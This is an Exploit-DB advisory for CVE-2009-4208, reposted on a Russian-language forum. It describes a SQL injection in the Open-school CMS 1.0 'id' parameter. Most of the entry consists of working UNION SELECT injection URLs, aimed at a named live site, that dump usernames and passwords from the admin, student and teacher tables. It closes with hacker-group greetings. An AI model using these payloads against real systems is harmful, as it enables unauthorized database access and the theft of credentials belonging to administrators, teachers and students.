- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8839
- Проверка EDB
-
- Пройдено
- Автор
- OZX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-4208
- Дата публикации
- 2009-06-01
Код:
Cms : Open-school
Version : 1.0
Archivo : Index.php
Parametro : id
Sitio :http://open-school.org
Url Vulnz :http://site.com/index.php?module=os_news&view=show&id=[SQLI]
Demo Injection:
Admin (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+admins
Students (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+students
Teachers (User,Pass):
http://open-school.org/index.php?module=os_news&view=show&id=3+and+1=0+union+select+all+1,group_concat(username,0x3A,password),3,4,5,6,7,8,9,10+from+teachers
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
# milw0rm.com [2009-06-01]- Источник
- www.exploit-db.com
